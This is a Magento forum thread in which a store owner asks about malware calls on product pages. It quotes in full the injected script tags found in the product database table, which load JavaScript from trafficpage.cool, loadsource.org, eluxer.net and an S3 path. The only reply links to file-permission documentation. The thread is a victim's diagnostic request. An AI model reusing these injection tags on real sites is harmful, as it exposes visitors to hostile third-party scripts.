Magento Forums
Help
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 

Malware attack

SOLVED
Go to solution
‎08-18-2018 05:53 PM
‎08-18-2018 05:53 PM

Malware attack

When I load any of my products' page the below sites, like eluxer.net, loadsource.org, s3.amazonaws.com and trafficpage.cool are being called and they are clearly malwares. How can I remove them?

I had some security flaws that were fixed, but still didn't identify the origin of this attack.

magento2_malware.PNG

0 Kudos
Reply
1 ACCEPTED SOLUTION

Accepted Solutions
‎08-22-2018 11:23 PM
‎08-22-2018 11:23 PM

Re: Malware attack

Hello @mathro,

 

You get more detail about ownership of directory in production mode here https://devdocs.magento.com/guides/v2.0/config-guide/prod/prod_file-sys-perms.html

 

--
If you've found one of my answers useful, please give Kudos or Accept as Solution

View solution in original post

0 Kudos
Reply
2 REPLIES 2
‎08-21-2018 05:49 PM
‎08-21-2018 05:49 PM

Re: Malware attack

I identified that all the registers on catalog_product_entity_text table had this script injected:

<script src=\"//s3.amazonaws.com/js-static/1cdd8fd283222f8300.js\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://trafficpage.cool/optout/set/lat?jsonp=__twb_cb_699089770&amp;key=1cdd8fd283222f8300&amp;cv=1533297485&amp;t=1533297485170\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://trafficpage.cool/optout/set/lt?jsonp=__twb_cb_795376469&amp;key=1cdd8fd283222f8300&amp;cv=1678&amp;t=1533297485174\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://trafficpage.cool/addons/lnkr5.min.js\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51469x7389x&amp;r=1533297485200\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://trafficpage.cool/addons/lnkr30_nt.min.js\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://eluxer.net/code?id=105&amp;subid=51469_7389_\" type=\"text/javascript\" xml=\"space\"></script>

I confess that I failed to keep all my directories safe, giving them stricter permissions and this could potentially be the reason of this injection. Could anyone confirm, give any clues?

How can I avoid future javascript injections? 

 

0 Kudos
Reply
‎08-22-2018 11:23 PM
‎08-22-2018 11:23 PM

Re: Malware attack

Hello @mathro,

 

You get more detail about ownership of directory in production mode here https://devdocs.magento.com/guides/v2.0/config-guide/prod/prod_file-sys-perms.html

 

--
If you've found one of my answers useful, please give Kudos or Accept as Solution

0 Kudos
Reply